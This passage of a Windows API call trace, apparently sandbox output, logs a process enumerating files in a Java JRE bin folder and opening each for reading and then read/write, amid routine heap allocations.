(HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0093.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 48 [0093.248] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.248] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lcms.dll", cAlternateFileName="")) returned 1 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0093.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0093.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.249] AreFileApisANSI () returned 1 [0093.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll", lpUsedDefaultChar=0x0) returned 48 [0093.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.249] AreFileApisANSI () returned 1 [0093.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0093.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 48 [0093.249] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.454] GetFileType (hFile=0x360) returned 0x1 [0093.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0093.454] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.454] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.455] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.455] CloseHandle (hObject=0x360) returned 1 [0093.455] AreFileApisANSI () returned 1 [0093.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0093.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 48 [0093.455] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.455] GetFileType (hFile=0x360) returned 0x1 [0093.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.455] CloseHandle (hObject=0x360) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.457] AreFileApisANSI () returned 1 [0093.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll") returned 48 [0093.457] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39040)) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.457] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="management.dll", cAlternateFileName="MANAGE~1.DLL")) returned 1 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0093.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0093.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.458] AreFileApisANSI () returned 1 [0093.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll", lpUsedDefaultChar=0x0) returned 54 [0093.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.458] AreFileApisANSI () returned 1 [0093.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0093.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 54 [0093.458] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.458] GetFileType (hFile=0x360) returned 0x1 [0093.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0093.459] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.459] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.459] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.459] CloseHandle (hObject=0x360) returned 1 [0093.459] AreFileApisANSI () returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75c60 [0093.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll") returned 54 [0093.459] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.460] GetFileType (hFile=0x360) returned 0x1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0093.460] CloseHandle (hObject=0x360) returned 1 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.461] HeapFree (in: 